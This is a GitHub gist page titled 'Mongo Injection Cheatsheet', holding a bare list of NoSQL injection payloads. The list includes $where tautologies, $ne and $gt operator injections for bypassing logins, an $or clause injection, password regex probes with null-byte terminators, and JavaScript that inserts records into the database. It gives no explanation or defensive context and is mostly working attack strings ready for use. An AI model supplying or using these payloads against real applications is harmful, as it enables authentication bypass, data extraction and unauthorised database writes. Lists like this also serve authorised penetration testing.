Skip to content

Instantly share code, notes, and snippets.

@trickycdm

trickycdm/mongodb-injection-cheatsheet.md

Last active July 4, 2017 20:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save trickycdm/14eda306aae2c030c9f9d51ff1683f1e to your computer and use it in GitHub Desktop.
Save trickycdm/14eda306aae2c030c9f9d51ff1683f1e to your computer and use it in GitHub Desktop.
Download ZIP
Mongo Injection Cheatsheet
Raw
mongodb-injection-cheatsheet.md

true, $where: '1 == 1'

, $where: '1 == 1'

$where: '1 == 1'

', $where: '1 == 1'

1, $where: '1 == 1'

{ $ne: 1 }

', $or: [ {}, { 'a':'a

' } ], $comment:'successful MongoDB injection'

db.injection.insert({success:1});

db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1

|| 1==1

' && this.password.match(/.*/)//+%00

' && this.passwordzz.match(/.*/)//+%00

'%20%26%26%20this.password.match(/.*/)//+%00

'%20%26%26%20this.passwordzz.match(/.*/)//+%00

{$gt: ''}

{"$gt": ""}

[$ne]=1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment